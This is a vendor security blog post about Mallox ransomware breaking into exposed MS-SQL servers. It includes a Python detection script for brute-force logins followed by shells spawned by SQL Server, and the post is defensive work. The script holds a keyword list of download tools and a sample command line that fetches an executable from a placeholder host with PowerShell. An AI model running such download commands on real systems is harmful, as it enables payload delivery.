Mallox Ransomware Detection: Increasing Attacks Abusing MS-SQL Servers


Cyber defenders have seen a recent increase in cyber attacks distributing Mallox ransomware. Over a period of two years, ransomware operators abused MS-SQL servers as the initial access vector to spread the infection further.

Mallox ransomware detection

With the increasing activity of the Mallox ransomware gang and their ambitions to expand the impact and scope of their attacks, cyber defenders require hyper-responsiveness to stay ahead of the associated threats. By leveraging the SOC Prime platform for collective cyber defense, security teams can equip themselves with innovative tools to detect ransomware attacks faster and more effectively, prioritize their detection and hunting procedures, and future-proof their cybersecurity posture.

To access the full list of Sigma rules for detecting Mallox ransomware, click the Explore Detections button. Security engineers can gain insight into the context of the threat, including ATT&CK and CTI references and other metadata useful for threat investigation.


All of the aforementioned Sigma rules are mapped to the MITRE ATT&CK framework and are compatible with cloud-native SIEM and other security solutions. Alternatively, security engineers can apply the relevant Sigma rules by searching for TargetCompany, FARGO, or Tohnichi, the other aliases under which Mallox ransomware is tracked.

Mallox Ransomware Analysis

Unit 42 researchers reported an increase in Mallox ransomware distribution driven by mass exploitation of MS-SQL servers, with activity growing by more than 150% compared to 2022. In these campaigns, Mallox operators combine brute-force attacks, data exfiltration and other adversary techniques. The group is also expanding its reach by recruiting partners on dark web forums for its RaaS affiliate program.

Mallox ransomware operators steal data from targeted organizations and then pressure the victims into paying a ransom by threatening to leak the stolen data. They have affected dozens of organizations around the world across several industry sectors.

Since Mallox ransomware operators appeared on the threat landscape in 2021, they have consistently used the same intrusion method: exposed MS-SQL servers. In the initial attack phase, adversaries brute-force access to the server and then use command-line actions and PowerShell code to download the Mallox ransomware payload from a remote host.
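The intrusion chain just described (credential brute force against an exposed MS-SQL instance, followed by a shell and PowerShell launched from the database process to fetch the payload) is something a SOC can test its detection logic against. The following Python script is an added example written for this post; it is not SOC Prime's Sigma content and not taken from the Unit 42 report. It assumes a simplified log shape (SQL Server failed-login events and Sysmon-style process-creation events already normalized into dictionaries), constructed sample records, and assumed thresholds, field names and keyword lists; the parent/child pattern of sqlservr.exe spawning cmd.exe or powershell.exe is a common generalization of the "command-line and PowerShell" step rather than a detail stated on the page.

```python
"""Detection logic for the MS-SQL abuse chain (added example, not SOC Prime code).

Assumed, simplified record shape (constructed for this example):
  {"ts": ISO-8601, "host": str, "event": "sql_login_failed", "src_ip": str}
  {"ts": ISO-8601, "host": str, "event": "process_create",
   "parent_image": str, "image": str, "command_line": str}
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed tuning values; real deployments derive these from baseline traffic.
BRUTE_FORCE_THRESHOLD = 5                 # failed logins from one source ...
BRUTE_FORCE_WINDOW = timedelta(minutes=2) # ... within this window
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "curl ", "certutil", "bitsadmin")


def _basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_brute_force(records):
    """Return {(host, src_ip): first_ts} for sources that exceed the threshold
    inside the sliding window (the brute-force stage of the chain)."""
    by_src = defaultdict(list)
    for r in records:
        if r["event"] == "sql_login_failed":
            by_src[(r["host"], r["src_ip"])].append(datetime.fromisoformat(r["ts"]))
    hits = {}
    for key, times in by_src.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > BRUTE_FORCE_WINDOW:
                start += 1
            if end - start + 1 >= BRUTE_FORCE_THRESHOLD:
                hits[key] = times[start]
                break
    return hits


def detect_sql_spawned_shell(records):
    """Return findings for shells spawned by sqlservr.exe, flagging
    command lines that contain download-related keywords."""
    findings = []
    for r in records:
        if r["event"] != "process_create":
            continue
        child = _basename(r["image"])
        if _basename(r["parent_image"]) == "sqlservr.exe" and child in SHELL_CHILDREN:
            cl = r["command_line"].lower()
            findings.append({"host": r["host"], "ts": r["ts"], "child": child,
                             "download": any(m in cl for m in DOWNLOAD_MARKERS)})
    return findings


def correlate(records):
    """Raise severity when a shell from SQL Server follows brute force on the same host."""
    bf_hosts = {host for (host, _ip) in detect_brute_force(records)}
    alerts = []
    for f in detect_sql_spawned_shell(records):
        seen = f["host"] in bf_hosts
        severity = "high" if seen and f["download"] else "medium"
        alerts.append({**f, "brute_force_seen": seen, "severity": severity})
    return alerts


def _login_fail(host, ip, ts):
    return {"ts": ts, "host": host, "event": "sql_login_failed", "src_ip": ip}


# Constructed sample records: six rapid failures from one source on SQL01, one
# stray failure from another source, then shells spawned on SQL01 and SQL02.
SAMPLE_RECORDS = [
    _login_fail("SQL01", "203.0.113.7", f"2023-07-20T10:0{i // 4}:{(i * 15) % 60:02d}")
    for i in range(6)
] + [
    _login_fail("SQL01", "198.51.100.4", "2023-07-20T10:05:00"),
    {"ts": "2023-07-20T10:02:10", "host": "SQL01", "event": "process_create",
     "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -c Invoke-WebRequest -Uri "
                     "http://placeholder.invalid/x -OutFile C:\\Windows\\Temp\\x.exe"},
    {"ts": "2023-07-20T11:00:00", "host": "SQL02", "event": "process_create",
     "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"ts": "2023-07-20T09:00:00", "host": "SQL01", "event": "process_create",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "command_line": "sqlservr.exe -sMSSQLSERVER"},  # benign service start
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_RECORDS):
        print(alert)
```

The two detections are deliberately kept separate: the brute-force check is noisy on its own (internet-facing SQL servers are scanned constantly), and a shell under sqlservr.exe is rare but can be legitimate in shops that use xp_cmdshell for maintenance jobs. Correlating them per host is what lifts the combination to a high-severity alert, and the same structure maps onto a Sigma correlation rule once the field names are adjusted to the SIEM's schema.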

As a practical measure for reducing the attack surface, defenders recommend verifying the configuration of internet-facing applications, MS-SQL servers included, and applying all required updates and patches.

Get access to over 650 unique Sigma rules for detecting ransomware attacks to increase your cyber resilience. Get 30+ rules for free or access all detections via On Demand at https://tdm.socprime.com/journey/tdm/.

The post Mallox Ransomware Detection: Increasing Attacks Abusing MS-SQL Servers appeared first on SOC Prime.
